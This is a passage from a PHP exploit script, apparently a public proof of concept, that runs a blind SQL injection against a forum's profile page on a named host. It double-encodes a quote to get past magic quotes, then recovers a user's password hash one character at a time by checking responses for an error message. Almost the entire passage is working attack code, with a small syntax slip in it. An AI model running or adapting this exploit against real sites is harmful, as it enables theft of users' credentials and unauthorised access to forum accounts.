so credit to str0ke and milkw0rm */ $server = "www.uberhacker.com "; $user="Dozix007" $port = 80; $hash = ""; $hex = "0123456789abcdef"; for($i = 1; $i <= 32; $i++ ) { $idx = 0; $found = false; while( !($found) ) { $letter = substr($hex, $idx, 1); /* %2527 translates to %27, which gets past magic quotes. This is translated to ' by urldecode. */ $url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter; $header = getHeader($server, $port, $url, ""); if(!preg_match("/An Error Has Occurred/",$header) ) { echo $i . ": " . $letter . "\n"; $found = true; $hash .= $letter; } else { $idx++; } } } echo "\n\nFinal Hash: $hash\n"; function getHeader($server, $port, $file, $cookie) { $ip = gethostbyname($server); $fp = fsockopen($ip, $port); if (!$fp) { return "Unknown"; } else { $com = "GET $file HTTP/1.1\r\n"; $com .= "Host: $server:$port\r\n"; $com .= "Connection: close\r\n"; $com .= "\r\n"; fputs($fp, $com); $header=""; do { $header.= fread($fp, 512); } while( !preg_match('/\r\n\r\n$/',$header) ); } return $header; } ?>